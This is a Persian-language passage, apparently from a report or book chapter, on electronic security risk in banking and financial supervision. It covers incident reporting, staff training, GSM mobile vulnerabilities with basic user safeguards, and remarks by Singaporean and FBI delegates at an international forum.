‫ﮔﺮﻭﻩ ﻳﻜﭙﺎﺭﭼﻪﺳﺎﺯﻱ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻣـﺴﺌﻮﻟﻴﺖ ﺍﺭﺍﺋـﻪ ﮔﺰﺍﺭﺷـﺎﺕ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﻭ ﺑﺮﮔﺰﺍﺭﻱ ﺳـﻤﻴﻨﺎﺭﻫﺎ ﺩﺭ ﻣﻮﺿـﻮﻉ ﻛـﺎﻫﺶ‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﺮﻓﺖ‪.‬‬
‫ﻻ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﻛﻤﺒﻮﺩ ﺗﻴﻤﻬﺎﻱ‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻣﻨﻴﺘﻲ ﺗﻌﻠﻴﻢﺩﻳـﺪﻩ‪ ،‬ﻓﻘـﺪﺍﻥ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﻛـﺎﺭﺁﻱ ﺩﻭﻟﺘـﻲ ﺑـﺮﺍﻱ‬
‫ﻛﻨﺘﺮﻝ ﺻﺤﺖ‪ ،‬ﻭ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﺜﻞ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳـﻴﺎﺭ‪.‬‬
‫ﺳﺘﻮﻧﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻫﺴﺘﻨﺪ ﻭ ﺑـﻪ‬
‫ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺳﺎﻳﺒﺮ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻫﻢ ﺑـﻪ ﻫﻤـﺎﻥ‬
‫ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﮔﺴﺘﺮﺵ ﻣﻲﺑﺎﺷﻨﺪ‪ ،‬ﻣﻴﻠﻴﺎﺭﺩﻫـﺎ ﺩﻻﺭ ﺳـﺮﻣﺎﻳﻪ ﺩﺭ‬
‫ﻣﻌﺮﺽ ﺧﻄﺮ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻫﺪﻑ ﮔﻔﺘﮕﻮﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘـﺮﺩﺍﺧﺘﻦ‬
‫ﺑﻪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﭼﺮﺍ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺥ ﻣﻲﺩﻫﻨـﺪ‪ ،‬ﺑﻠﻜـﻪ ﺁﻥ‬
‫ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻼﺕ ﭼﻪ ﻛﺎﺭﻱ ﻣﻲﺗﻮﺍﻥ ﺍﻧﺠﺎﻡ ﺩﺍﺩ‪.‬‬
‫‪٢٢٢‬‬
‫ﺳﻮﻡ‪ ،‬ﻋﺪﻡ ﮔـﺰﺍﺭﺵ ﺭﻭﻳـﺪﺍﺩﻫﺎ ﻳـﻚ ﻣـﺎﻧﻊ ﺟـﺪﻱ ﺑـﺮﺍﻱ ﺩﺭﻙ‬
‫ﻣﺤﺪﻭﺩﺓ ﺗﻬﺪﻳﺪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﻫﻨﻮﺯ ﺑﻲ ﻣﻴﻠـﻲ ﻗﺎﺑـﻞ‬
‫ﺗﻮﺟﻬﻲ ﻧﺴﺒﺖ ﺑﻪ ﮔﺰﺍﺭﺵ ﻋﻤﻮﻣﻲ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﭼﻬﺎﺭﻡ‪ ،‬ﻋﻼﻭﻩ ﺑﺮ ﺑـﻲﻋﻼﻗﮕـﻲ ﻣﺆﺳـﺴﺎﺕ ﺑـﻪ ﮔـﺰﺍﺭﺵﻛـﺮﺩﻥ‬
‫ﺭﺧﺪﺍﺩﻫﺎ‪ ،‬ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎ ﻧﻴـﺰ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩ ﺍﺳﺖ‪.‬‬
‫ﺳﺮﺍﻧﺠﺎﻡ ﺁﻧﻜﻪ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﭽﻨﺎﻥ ﻧﻘﺶ ﻣﺤﻮﺭﻱ ﺑﺎﺯﻱ ﻣﻲﻛﻨﻨـﺪ‬
‫ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﻲﺗﺠﺮﺑﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷـﺒﻜﻪ ﺭﺍ ﺯﻳـﺮ‬
‫ﺳﺆﺍﻝ ﺑﺒﺮﺩ؛ ﻭ ﻟﺬﺍ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻛﻪ ﺁﮔﺎﻫﻲ ﺗﻤﺎﻡ ﺍﻓـﺮﺍﺩ ﻧـﺴﺒﺖ‬
‫ﺑﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ‬
‫ﺩﺭﺳﺘﻲ ﻣﺪﻳﺮﻳﺖ ﻧـﺸﻮﻧﺪ‪ ،‬ﻧـﺎﮔﺰﻳﺮ ﺍﻋﺘﻤـﺎﺩ ﻋﻤـﻮﻣﻲ ﻧـﺴﺒﺖ ﺑـﻪ‬
‫ﻓﻨﺎﻭﺭﻱ ﺧﺪﺷﻪﺩﺍﺭ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺑﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ﻣﻮﺍﺭﺩ‪ ،‬ﺑﺮﺍﻱ‬
‫ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺳﻄﻮﺡ ﺑﺎﻻﺗﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻱ‬
‫ﻣﺘﻌﺪﺩ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﺮﺩﺍﺷﺖ‪:‬‬
‫ﺍﻭﻝ‪ ،‬ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ‪ ،‬ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻭ ﺳﺎﻳﺮ ﺩﺳﺖﺍﻧﺪﺭﻛﺎﺭﺍﻥ ﺑـﺎﺯﺍﺭ‬
‫ﺑﺎﻳﺪ ﺩﺭ ﺟﻬﺖ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﮔﺴﺘﺮﺵ ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻗﺪﺍﻡ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﻭﻡ‪ ،‬ﻫﻤﻜﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺍﻣﺮﻱ ﻋﺎﺩﻱ ﻭ ﻫﻤﻴﺸﮕﻲ ﺗﺒـﺪﻳﻞ ﺷـﻮﺩ؛‬
‫ﺑﺨﺼﻮﺹ ﺑﺎ ﻋﻨﺎﻳﺖ ﺧﺎﺹ ﺑﻪ ﺭﻓﻊ ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻴﺪﻱ ﻛﻪ ﻣﺘﻮﺟـﻪ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻋﻤﻮﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺳﺖ‪.‬‬
‫ﺳﻮﻡ‪ ،‬ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺁﻣﻮﺯﺷـﻲ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﻭ ﻣﻤﻴـﺰﺍﻥ ﻗـﺴﻤﺖ‬
‫ﺍﻣﻨﻴﺖ ﺑﺎﻳﺪ ﺍﺯ ﺍﻭﻟﻮﻳﺖ ﺑـﺎﻻﻳﻲ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﺗﺠـﺎﺭﻱ ﻭ ﺩﻭﻟـﺖ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺗﻌﺮﻳﻒ ﻭ ﮔﺴﺘﺮﺓ ﻋﻤﻠﻲ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳـﺪ ﺷـﺎﻣﻞ‬
‫ﻲ ﺗﻬﺪﻳــﺪﺍﺕ‬
‫ﺍﻧــﻮﺍﻉ ﻣﺨــﺎﻃﺮﺍﺕ ﺳــﺎﻳﺒﺮ ﺑﻌــﻼﻭﺓ ﺍﹶﺷــﻜﺎﻝ ﺳــﻨﺘ ﹺ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﻭ ﻓﻴﺰﻳﻜﻲ ﻧﻴﺰ ﺑﺎﺷﺪ‪.‬‬
‫ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ‬
‫ﺩﺭ ﺣﺎﻟﻲ ﻛﻪ ﺑﺨﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣـﺮﺯ ﺗﻮﺍﻧﺎﻳﻴﻬـﺎ ﻭ‬
‫ﺍﺳﺘﻌﺪﺍﺩﻫﺎﻱ ﻣﺤﻠﻲ ﺭﺷﺪ ﻣﻲﻛﻨﺪ‪ ،‬ﺭﺟﻮﻉ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺑـﺮﺍﻱ‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺑﻪ ﻳﻚ ﻛﺎﺭ ﺭﺍﻳﺞ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﺧﺼﻮﺻﹰﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﻣﻨﺎﺑﻊ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ‪ ،‬ﻫـﻢ ﺗﻬﺪﻳـﺪﻫﺎ ﻭ ﻫـﻢ‬
‫ﻓﺮﺻﺘﻬﺎﻳﻲ ﺭﺍ ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺟﻬـﺖ ﻛـﺎﻫﺶ ﺗﻬﺪﻳـﺪ ﻫـﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺗﻮﻓﻴﻖ ﺍﺟﺒﺎﺭﻱ ﺑﺮﺍﻱ‬
‫ﺑﺎﻧﻜﻬﺎ ﺩﺍﻧﺴﺖ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻳـﻚ ﺑﺮﻧﺎﻣـﺔ ﻭﺍﻛﻨـﺸﻲ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩ ﻫﺎﻱ ﻣﺸﺘﺮﻱ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺗﻬﺪﻳـﺪﻫﺎ ﺗـﺪﻭﻳﻦ‬
‫ﻛﻨﻨﺪ ﻭ ﺩﺭ ﺍﻳﻦ ﻣﺴﻴﺮ ﺗﻤﺎﻡ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﺑـﺮﺍﻱ ﺁﻧﻬـﺎ‬
‫ﻓــﺮﺍﻫﻢ ﻣــﻲﺁﻭﺭﺩ‪ .‬ﺩﺭ ﭼﻨــﻴﻦ ﺑﺮﻧﺎﻣــﻪﺍﻱ ﺑﺎﻳــﺪ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ‬
‫ﺁﮔﺎﻫﻲﻳﺎﻓﺘﻦ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ‬
‫ﻧﻴﺰ ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻋﻠﻴﺮﻏﻢ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﺍﺑﺘﻜﺎﺭﻱ ‪ ،‬ﻫﻨﻮﺯ ﻫﻢ ﺍﻣﻨﻴﺖ‬
‫ﺑﻪ ﺍﻣﺮﻱ ﺳﺎﺩﻩ ﺗﺒﺪﻳﻞ ﻧﺸﺪﻩ ﺍﺳﺖ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﻤﭽﻨﺎﻥ ﻣﺮﺍﻗﺒﺖ ﻭ‬
‫ﺁﻣﻮﺯﺵ ﻣﺪﺍﻭﻡ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺑﻌﻀﻲ ﺣﻮﺯﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﺒﺎﺣـﺚ‬
‫ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺟﻪ ﺑﻴﺸﺘﺮﻱ ﻣﻲﻃﻠﺒﻨـﺪ ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ‪:‬‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ‪ ،‬ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢ ﻳـﺎﺏ‪ ،‬ﻭ‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‪.‬‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺳﻴﺎﺭ‪:‬‬
‫ﺩﺳﺘﺎﻭﺭﺩﻫﺎ ﻭ ﻣﺨﺎﻃﺮﺍﺕ ﺟﺪﻳﺪ‬
‫ﺩﺭ ﺳﺎﻝ ‪ GSM ،۲۰۰۲‬ﺣﺪﻭﺩ ‪ ۷۸۷‬ﻣﻴﻠﻴـﻮﻥ ﻛـﺎﺭﺑﺮ ﺩﺭ ﺳﺮﺍﺳـﺮ‬
‫ﺩﻧﻴﺎ ﺩﺍﺷﺖ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﻲ ﺳﻴﻢ ﺑﺎ ﺳﺮﻋﺘﻲ ﻣﻌﺎﺩﻝ ﺳﻪ ﺑﺮﺍﺑﺮ ﺳﺮﻋﺖ‬
‫ﺧﻄﻮﻁ ﺯﻣﻴﻨﻲ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻧﻴﺰ ﻣﺎﻧﻨـﺪ ﺳـﺎﻳﺮ‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻧﺴﺒﺖ ﺑﻪ ﺗﻜـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨـﺮﺏ ﻣﺜـﻞ‬
‫ﺗﺮﺍﻭﺍﻫﺎ‪ ،‬ﻭﻳﺮﻭﺳـﻬﺎ ﻭ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﺁﺳـﻴﺐﭘـﺬﻳﺮ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﺤﻴﻂ ﺧـﺼﻤﺎﻧﺔ ﺍﻳﻨﺘﺮﻧـﺖ‪ ،‬ﭘﺎﺷـﻨﺔ‬
‫ﻻ ﺍﺗـﺼﺎﻝ ﺑـﻲﺳـﻴﻢ‬
‫ﺁﺷﻴﻞ ﺍﻣﻨﻴﺖ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﺿــﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘــﺔ ﺯﻧﺠﻴــﺮ ﺍﻣﻨﻴﺘــﻲ ﻣﺤــﺴﻮﺏ ﻣــﻲﺷــﻮﺩ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ GSM‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻛـﺎﺭﺕ ‪،SIM‬‬
‫ﺑﻤﺒﺎﺭﺍﻥ ‪ ،SMS‬ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ‪ ،WAP‬ﻭ ﻧﻴﺰ ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺑـﺎ‬
‫‪٢٣٦‬‬
‫ﻧﺎﻡ "‪ "man in the middle‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﮔﺮﭼﻪ ﺍﻳﻤﻦﺳﺎﺯﻱ ﻛﺎﻣﻞ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﻣﻤﻜـﻦ ﻧﻴـﺴﺖ‪ ،‬ﺍﻣـﺎ‬
‫ﻛﺎﺭﺑﺮ ﺑﺎ ﭼﻨﺪ ﮔﺎﻡ ﺳﺎﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺧﻮﺩ ﺣﻔﺎﻇﺖ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮﻱ‬
‫ﺑﻌﻤﻞ ﺁﻭﺭﺩ‪:‬‬
‫•‬
‫•‬
‫•‬
‫ﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮ ﹺﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ؛‬
‫ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ؛‬
‫ﻧﺼﺐ ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺷﺨﺼﻲ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ؛‬
‫‪ ۲۳۶‬ﺩﺭ ﺍﻳﻦ ﻧﻮﻉ ﺣﻤﻠﻪ ﻳﻚ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺳﺘﻜﺎﺭﻱﺷﺪﻩ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺟﻌﻠﻲ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺗﻠﻔﻨﻬﺎﻱ ﻫﻤـﺮﺍﻩ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ ﻭ‬
‫ﺑﺪﻳﻦ ﺗﺮﺗﻴـﺐ ﻣﻬـﺎﺟﻢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺪﺯﺩﺩ‪ .‬ﺍﻃﻼﻋـﺎﺕ ﺩﺭ‬
‫ﻼ ﺧﺎﻟﺺ ﻭ ﺑﺪﻭﻥ ﻫﺮﮔﻮﻧﻪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ‬
‫‪gateway‬ﻫﺎ ﻛﺎﻣ ﹰ‬
‫ﺍﻳﻦ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻧﻬﺎ ﺑﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﺰﺭﮔﻲ‬
‫ﺭﻭﺑﺮﻭ ﺑﺎﺷﻨﺪ‪.‬‬
‫‪٢٢٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫•‬
‫•‬
‫ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﻳﻤــﻦ ﺍﺯ ﻭﺳــﺎﻳﻞ‪ ،‬ﻭ ﺣﻔﺎﻇــﺖ ﺍﺯ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ؛‬
‫ﻧﺼﺐ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ‪ .VPN‬ﺩﺭ ﻣﻮﺭﺩ ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻧﻴـﺰ‬
‫ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ﻧﺒﺎﻳﺪ ﺷﻤﺎﺭﻩﻫﺎﻱ ‪ PIN‬ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﻨﺪ‪.‬‬
‫ﺳﺨﻨﺮﺍﻧﻴﻬﺎﻱ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻛﺸﻮﺭﻫﺎ‬
‫ﺩﺭ ﻃﻮﻝ ﺑﺮﮔـﺰﺍﺭﻱ ﺍﻳـﻦ ﻧﺸـﺴﺖ ﺟﻬـﺎﻧﻲ ﺍﺯ ﻧﻤﺎﻳﻨـﺪﮔﺎﻥ ﻛﻠﻴـﺔ‬
‫ﻛﺸﻮﺭﻫﺎ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛﻪ ﺑﻪ ﺳﻪ ﺳﺆﺍﻝ ﺯﻳﺮ ﭘﺎﺳﺦ ﺩﻫﻨﺪ‪:‬‬
‫‪.۲‬‬
‫ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﺍﺯ ﭼـﻪ‬
‫ﻓﺮﺁﻳﻨﺪﻫﺎﻳﻲ ﺟﻬﺖ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫ﭘﻴﺮﻭﻱ ﻣﻲﻛﻨﻨﺪ ﻭ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﻧﻈﺎﺭﺕ ﺧﻮﺩ‬
‫ﺩﺭﻧﻈﺮ ﺩﺍﺭﻧﺪ؟‬
‫‪.۳‬‬
‫ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺟﺎﻧﺒﻪ ﻭ ﭼﻨﺪﻣﻠﻴﺘﻲ ﭼﻄـﻮﺭ ﻣـﻲ ﺗﻮﺍﻧﻨـﺪ ﺑـﺎ‬
‫ﻫﻤﻜﺎﺭﻱ ﺳﺎﻳﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻛﻨﻨﺪ؟‬
‫ﻳﻚ ﻧﻤﺎﻳﻨﺪﺓ ﻛﺸﻮﺭ ﺳﻨﮕﺎﭘﻮﺭ‪ ،‬ﺩﺭ ﭘﺎﺳﺦ ﺑﻪ ﺍﻳﻦ ﭘﺮﺳﺶ ﭘﻴـﺸﻨﻬﺎﺩ‬
‫ﺟﺮﻳﻤﻪﻫﺎﻱ ﺷﺪﻳﺪ ﺍﺩﺍﺭﻱ ﻭ ﺑـﻪﺭﻭﺯﻛـﺮﺩﻥ ﻣﻘـﺮﺭﺍﺕ ﺩﺭ ﻓﻮﺍﺻـﻞ‬
‫ﺯﻣﺎﻧﻲ ﻣﻨﻈﻢ ﺭﺍ ﺩﺍﺩ؛ ﭼﺮﺍﻛﻪ ﻣﻌﺘﻘﺪ ﺑﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﻣﺜﻞ "ﻗﺎﻧﻮﻥ ﺳﻮﺀ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪ"‪ ،‬ﻓﺎﻳﺪﺓ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﺗﺸﺨﻴﺺ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻭ‬
‫ﻛﺎﻫﺶ ﺟﺎﺫﺑﺔ ﺁﻥ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻏﻴﺮﺣﺮﻓﻪﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻩﺍﻧﺪ‪.‬‬
‫ﻳﻚ ﻧﻤﺎﻳﻨﺪﺓ ‪ FBI‬ﻧﻴﺰ ﺑﻴﺎﻥ ﻛﺮﺩ ﻛﻪ ﺍﻳﻦ ﻳﻚ ﭘﺪﻳـﺪﺓ ﺍﺟﺘﻤـﺎﻋﻲ‬
‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﻏﻴﺮﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻣﺮﺯﻫﺎ ﺍﺳﺖ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﻣـﻮﺍﺭﺩ ﻓـﺮﺩ‬
‫ﺧﻄﺎﻛﺎﺭ ﺷﺪﺕ ﺟﺮﻣﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺍﺭﺗﻜﺎﺏ ﺁﻥ ﺍﺳﺖ ﺭﺍ ﺗﺸﺨﻴﺺ‬
‫ﻧﻤﻲﺩﻫﺪ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ ﺑﻌﻀﻲ ﺍﻓـﺮﺍﺩ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺑﻌﻨـﻮﺍﻥ‬
‫ﺟﺮﻡ ﻭﺍﻗﻌﻲ ﺑﻪ ﺭﺳﻤﻴﺖ ﻧﻤﻲﺷﻨﺎﺳﻨﺪ‪ .‬ﺑﻌﻼﻭﻩ ﺑﺎﻧﻜﻬـﺎ ﻫـﻢ ﺑـﺮﺍﻱ‬
